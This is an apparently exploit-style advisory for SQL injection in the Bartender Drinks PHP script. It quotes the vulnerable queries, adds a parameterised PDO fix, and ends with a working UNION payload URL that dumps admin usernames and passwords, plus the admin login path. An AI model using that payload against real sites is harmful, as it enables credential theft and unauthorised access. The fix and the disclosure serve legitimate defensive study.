================================================================================
Bartender Drinks SQL-INJECTION
================================================================================
Application: Bartender Drinks
------------
Version: All
--------
Website: http://fivedollarscripts.com
--------
Demo: http://fivedollarscripts.com/drinks/
-----
Date: 04-08-2008
-----
[ VULNERABLE CODE ]
viewdrinks.php
PHP code:
// line 6
if($bgid=="")
{
    $sql="select * from drink order by upldate desc";
}
else
{
    // line 12: $bgid is concatenated into the query unquoted and unvalidated
    $sql="select * from drink where categoryid=$bgid order by upldate desc";
}
viewdrink.php
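PHP code:
// line 3: $recid is concatenated into the query unquoted and unvalidated
$sql="select * from drink where drinkid=$recid";
$res=mysql_query($sql);
// line 238: the same $recid is reused in the comments query
$result=mysql_query("select * from drinkscomments where approved='Y' and drinkid=$recid");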
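Added example (not part of the original advisory and not the vendor's code): the same three queries with the id validated as an integer and bound as a parameter instead of concatenated. It assumes $bgid and $recid arrive from the request as strings and that the application can use PDO; the helper names and the SQLite demo data are constructed.

```php
<?php
// Added example. Table/column names are from the excerpts above; the rest is constructed.

// Accept only a non-negative decimal integer; anything else becomes null.
function int_param($raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $v === false ? null : $v;
}

// Run a query with the id bound as an integer parameter, never concatenated.
function rows_by_id(PDO $db, string $sql, int $id): array
{
    $st = $db->prepare($sql);
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// viewdrinks.php: listing, optionally filtered by category.
function list_drinks(PDO $db, $bgid): array
{
    if ($bgid === null || $bgid === '') {
        return $db->query('select * from drink order by upldate desc')->fetchAll(PDO::FETCH_ASSOC);
    }
    $id = int_param($bgid);
    return $id === null ? []
        : rows_by_id($db, 'select * from drink where categoryid = :id order by upldate desc', $id);
}

// viewdrink.php: one drink and its approved comments; null for a bad or unknown id.
function get_drink(PDO $db, $recid): ?array
{
    $id = int_param($recid);
    $drink = $id === null ? [] : rows_by_id($db, 'select * from drink where drinkid = :id', $id);
    if (!$drink) {
        return null;
    }
    $sql = "select * from drinkscomments where approved = 'Y' and drinkid = :id";
    return ['drink' => $drink[0], 'comments' => rows_by_id($db, $sql, $id)];
}

// Constructed demo: in-memory SQLite stands in for the application's MySQL database.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('create table drink (drinkid int, categoryid int, name text, upldate text)');
$db->exec('create table drinkscomments (drinkid int, approved text, body text)');
$db->exec("insert into drink values (1, 2, 'Mojito', '2008-04-01')");
var_dump(get_drink($db, '1'));                 // well-formed id
var_dump(get_drink($db, '-1 union select 1')); // non-integer input, no query is issued
```

With the MySQL PDO driver, set PDO::ATTR_EMULATE_PREPARES to false so the statements are prepared on the server rather than interpolated client-side.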
===>>> Exploit:
http://host/index.php?cmd=6&recid=-1 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2 ,3 from drinksadmin/*
// Admin Login - http://host/admin2
by me